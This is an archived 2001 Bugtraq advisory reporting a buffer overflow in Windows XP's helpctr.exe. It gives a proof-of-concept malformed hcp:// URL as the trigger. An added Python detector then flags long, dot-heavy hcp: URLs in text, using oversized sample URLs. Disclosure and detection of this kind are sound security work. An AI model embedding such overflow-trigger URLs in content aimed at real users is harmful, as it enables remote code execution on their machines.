[23225] in bugtraq
Buffer overflow in Windows XP "helpctr.exe"
daemon@ATHENA.MIT.EDU (mozoral@superonline.com)
Wed Nov 21 21:28:05 2001
From: <mozoral@superonline.com>
To: bugtraq@securityfocus.com
Date: Wed, 21 Nov 2001 16:32:14 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-9
Content-Transfer-Encoding: 7bit
Message-Id: <20011121143110.PVMY436.fep01@[212.252.115.5]>
Hi,
I don't know if this has been reported before. I discovered an exploitable buffer overflow vulnerability in "helpctr.exe", which can enable an attacker to execute arbitrary code on remote users with a malformed URL.
Example:
"hcp://m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m"
Note: Dots are important; do not remove them.
I'm using Windows XP Pro Build 2600.
Meliksah Ozoral
mozoral@superonline.com
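
A defender-side check for the URL shape shown in this report, as an added example that is not part of the original post: it scans text (HTML, mail bodies, proxy logs) for hcp: URLs and flags unusually long or dot-heavy ones. The thresholds, the function name and the sample lines are assumptions; the post does not state at what length the overflow occurs.

```python
import re
from urllib.parse import unquote

# Assumed thresholds (not taken from the post): tune to your environment.
MAX_URL_LEN = 128
MAX_DOTS = 16

# Match hcp: URLs up to whitespace, a quote or an angle bracket.
# \b keeps schemes such as "dhcp:" from matching.
HCP_RE = re.compile(r"\bhcp:(?://)?[^\s\"'<>]+", re.IGNORECASE)


def suspicious_hcp_urls(text):
    """Return a list of (url, reasons) for hcp: URLs that exceed the limits."""
    findings = []
    # Decode percent-escapes once so %2e-encoded dots are counted too.
    decoded = unquote(text)
    for match in HCP_RE.finditer(decoded):
        url = match.group(0)
        reasons = []
        if len(url) > MAX_URL_LEN:
            reasons.append(f"length {len(url)} > {MAX_URL_LEN}")
        dots = url.count(".")
        if dots > MAX_DOTS:
            reasons.append(f"{dots} dots > {MAX_DOTS}")
        if reasons:
            findings.append((url, reasons))
    return findings


# Constructed sample input (not captured traffic).
SAMPLES = [
    '<a href="hcp://system/HomePage.htm">Help</a>',
    '<a href="hcp://' + ".".join(["m"] * 100) + '">click</a>',
    '<iframe src="HCP://' + "%2e".join(["a"] * 40) + '"></iframe>',
    '<a href="http://example.com/a.b.c.d">ordinary link</a>',
]

if __name__ == "__main__":
    for line in SAMPLES:
        for url, reasons in suspicious_hcp_urls(line):
            print(f"ALERT {url[:40]}... ({'; '.join(reasons)})")
```
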